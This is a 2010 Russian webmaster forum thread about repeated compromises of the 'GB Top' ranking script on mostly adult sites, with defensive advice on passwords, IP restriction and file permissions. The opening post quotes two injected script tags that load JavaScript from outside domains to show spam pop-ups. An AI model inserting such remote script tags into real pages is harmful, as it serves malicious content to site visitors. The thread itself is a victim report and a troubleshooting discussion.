Реклама на сайте Advertise with us

(Лечение!) Ахтунг атакуют топы или дыра GB Top

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

ябудубудай

С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038

Ссылка на сообщениеДобавлено: 17/11/10 в 08:05       Ответить с цитатойцитата 

опять сталкиваюсь с такой проблемой что мои топы поламаны и в них содержит посторонний
Код:
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>
<script src=http://crv.cc/c/></script>

При заходи на сайт и после полной загрузки страницы появляется всплывающее поп окошко с рекламой виагры!
П.С. Версию топа обновил до последней версии 5.4 пасы поменял антивирус не выключаю но в скрипте время от времени бывает появляется посторонний код, даже гугл аналистик удалил, может через него как запихивают, хотя сколько работаю в онлайн не разу не сталкивался чтоб сайт был поломан только после того как в скрипте однажды появилась дырочка )

3
 



С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957

Ссылка на сообщениеДобавлено: 17/11/10 в 17:56       Ответить с цитатойцитата 

Возможно первый раз когда в шаблоны через узявимость был вставлен сплоит - ты заразил комп трояном с ф-цие форм грабер или ФТП снифером.
Хацкер смотря логи трояна увидел пароль на вход в админку и юзает его сейчас, тоже самое и с ФТП - возможно имеет доступ к фтп и инжектит всякие компоненты!
Как вариант
-поменяй пароли к admin.php
-смени ФТП пароль или разреши только с твоего ИП заходить на ФТП
-на файлы темплейтов поставть права 644 (редактировать придётся десктопно)
-проверь комп с помощью KIS и Cure It вохможно где то засел троян, так же на сервере где топы может быть руткит.

Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557

6
 

ASSES AND TITS

С нами с 15.03.03
Сообщения: 4478
Рейтинг: 1816

Ссылка на сообщениеДобавлено: 19/11/10 в 23:32       Ответить с цитатойцитата 

admin.php сделать блокировку доступа по айпи - в настройках вэб сервера

это самое простое

Take Bucks
BoysHDVideos.com - новый сайт! TryAnalFisting.com - лучшее ратио!

6
 



С нами с 30.10.07
Сообщения: 115
Рейтинг: 132

Ссылка на сообщениеДобавлено: 30/11/10 в 13:42       Ответить с цитатойцитата 

Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт

6
 



С нами с 06.06.03
Сообщения: 228
Рейтинг: 454

Ссылка на сообщениеДобавлено: 30/11/10 в 15:56       Ответить с цитатойцитата 

Удалил...

Ferrocash.com

0
 



С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957

Ссылка на сообщениеДобавлено: 01/12/10 в 12:34       Ответить с цитатойцитата 

Danyil у тебя тоже через webmasters регу инекцию кода сделали?
Что то повальное заражение идёт....

Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557

6
 



С нами с 29.07.03
Сообщения: 682
Рейтинг: 440

Ссылка на сообщениеДобавлено: 01/12/10 в 19:03       Ответить с цитатойцитата 

salo писал:
Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт


Ахуенный дез топа! Очень понравился.

0
 



С нами с 21.12.06
Сообщения: 92
Рейтинг: 29

Ссылка на сообщениеДобавлено: 02/12/10 в 19:54       Ответить с цитатойцитата 

salo писал:
Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт

Спасибо, почистил

0
 



С нами с 06.06.03
Сообщения: 228
Рейтинг: 454

Ссылка на сообщениеДобавлено: 02/12/10 в 21:42       Ответить с цитатойцитата 

С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...

Ferrocash.com

6
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 02/12/10 в 22:54       Ответить с цитатойцитата 

Danyil: Этот же фаил заменяется при обновлении топа

0
 



С нами с 20.07.05
Сообщения: 315
Рейтинг: 407

Ссылка на сообщениеДобавлено: 06/12/10 в 22:56       Ответить с цитатойцитата 

Danyil писал:
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...

Я на все index.* ставлю 444, да и на прочее, не требующее записи, тоже по возможности. Во многих случаях спасает...

TOP/Links trade 2Gb BackUp

6
 



С нами с 30.10.07
Сообщения: 115
Рейтинг: 132

Ссылка на сообщениеДобавлено: 11/12/10 в 00:23       Ответить с цитатойцитата 

как все таки грамотно выставить на ГБ топ права чтобы и от атак обезвредить и чтобы все считало и работало
на саму папку где находится скрипт 755
alternative-templates 755
autorank 755
backupfiles 777
cgi-bin 755
datafiles 777
docs 755
memberfiles 777
templates 755
index.php 644
переименовать admin.php на другой и выставить 755
удалить File phpinfo.php
Все правильно ??? я пережил уже 4 атаки icon_evil.gif

6
 



С нами с 30.10.07
Сообщения: 115
Рейтинг: 132

Ссылка на сообщениеДобавлено: 11/12/10 в 00:24       Ответить с цитатойцитата 

я выставлял и на templates 644, на как то через раз открывает страницу топа

6
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 11/12/10 в 12:45       Ответить с цитатойцитата 

На пакпу темплейтс оставляйте 777 а на то что внутри 644. фаил uninstall.php тоже удалите.

0
 



С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970

Ссылка на сообщениеДобавлено: 11/12/10 в 13:52       Ответить с цитатойцитата 

alternative-templates 755
autorank 755
cgi-bin 755
docs 755
и не нужны

6
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 11/12/10 в 14:00       Ответить с цитатойцитата 

gimcnuk: Эт точно. Ксттаи такое ощущение что овнеру срикпт не нужен может купим вскладчину?

0
 



С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970

Ссылка на сообщениеДобавлено: 11/12/10 в 14:08       Ответить с цитатойцитата 

Он не продаёт, там алгоритм уникальный.
Вскладчину можно и новый скрипт заказать и выложить по GPL лицензии. Только без меня icon_cool.gif

6
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 11/12/10 в 14:17       Ответить с цитатойцитата 

gimcnuk: Что так icon_mrgreen.gif?

0
 



С нами с 21.12.06
Сообщения: 92
Рейтинг: 29

Ссылка на сообщениеДобавлено: 15/12/10 в 00:00       Ответить с цитатойцитата 

Седня п*др опять повесил свою фигню на все мои сайты, правит все сайты на серваке (индексы и протоновский ssi_in.php). Смотрите не было ли у вас рецидива...

6
 

ябудубудай

С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038

Ссылка на сообщениеДобавлено: 15/12/10 в 19:48       Ответить с цитатойцитата 

и мои тоже сайты как всегда подверглись очередной атаке, самое интересное это хакеридзе все придумывает и неустает очередные идеи как обмануть честных мастеров, заходил под ру айпи все ок, вирусов нету, а если зайти через зарубежные айпи то вирус как ту появляется, предполагаю что хакер русский или где не далеко, бывает редирект идет на русские ПП и в основном это фарма. Будемс ждать следующей атаки... ;)

6
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 15/12/10 в 21:51       Ответить с цитатойцитата 

Ищите айпишник его, выкладывайте надо решать что то

0
 



С нами с 30.10.07
Сообщения: 115
Рейтинг: 132

Ссылка на сообщениеДобавлено: 19/12/10 в 19:00       Ответить с цитатойцитата 

18 числа опять хакер изменил index.php, стояли права 644, хз че делать, в админке хоста пишет что файл изменил apache

6
 



С нами с 30.10.07
Сообщения: 115
Рейтинг: 132

Ссылка на сообщениеДобавлено: 19/12/10 в 19:12       Ответить с цитатойцитата 

кое-где он после замены файла права на 444 поменял, как то

6
 

ябудубудай

С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038

Ссылка на сообщениеДобавлено: 19/12/10 в 19:25       Ответить с цитатойцитата 

да ваще безобразие творится какое то )
---
Подскажите, если с ГБ скрипта перейти на скрипт сиджей например на кристал, протон, трейд пульс может быть не будет таких атак? ГБ Скрипт все меньше и меньше теряет свои позиции бесплатного популярного скрипта, как раньше было smail54.gif

0
 



С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970

Ссылка на сообщениеДобавлено: 19/12/10 в 20:05       Ответить с цитатойцитата 

salo: возможно, был залит бекдор и гбскрипт уже не при чём. Поищи сторонние файлы.

6
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »